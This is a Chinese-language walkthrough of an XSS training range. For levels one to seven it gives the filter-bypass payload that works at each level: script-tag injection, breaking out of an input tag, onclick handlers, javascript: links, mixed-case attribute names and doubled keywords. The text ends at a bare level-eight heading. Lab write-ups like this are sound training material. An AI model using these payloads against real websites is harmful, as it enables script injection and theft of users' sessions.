靶场地址:http://xss.fbisb.com/yx/level1.php?name=test
第一关
解析:直接将test修改成为<script>alert(/xss/)</script>
进入第二关
第二关
解析:
1-先输入测试码 ('"<>script)
2-查看源码有部分被过滤
3-闭合input标签部分
4-输入payload: "></input><script>alert(/xss/)</script>
第三关
解析:
1-输入测试码
2-value里面的<>被实体化;所以用onclick事件
3-payload:'onclick=alert() '
4-直接点击输入框(如果不行等一等在点击,会有缓冲)
第四关
解析:
1-输入测试码
2-<> 被过滤,直接用onclick事件
3-payload:" onclick=alert(/xss/) "
第五关
解析:
1-输入测试码有对script过滤
2-用 onclick 事件
3- onclick 事件也有过滤
4-用 img 标签,发现onerror也有过滤
5-用 "> <a href=javascript:alert()>something</a>
6-成功
第六关
解析:
1-script、onerrer、onclick都被过滤
2-输入 "> <a href=javascript:alert()>something</a>
3- herf 也被过滤
4-将 herf 大小写试一试
5- "> <a hrEf=javascript:alert()>something</a>
6- 即可完成
第七关
解析:
1- script被过滤掉
2- on 也被过滤掉
3- 使用复写 scrscriptipt 级成功
4- 使用 payload: "></input><scrscriptipt>alert(/xss/)</scriscriptpt>
第八关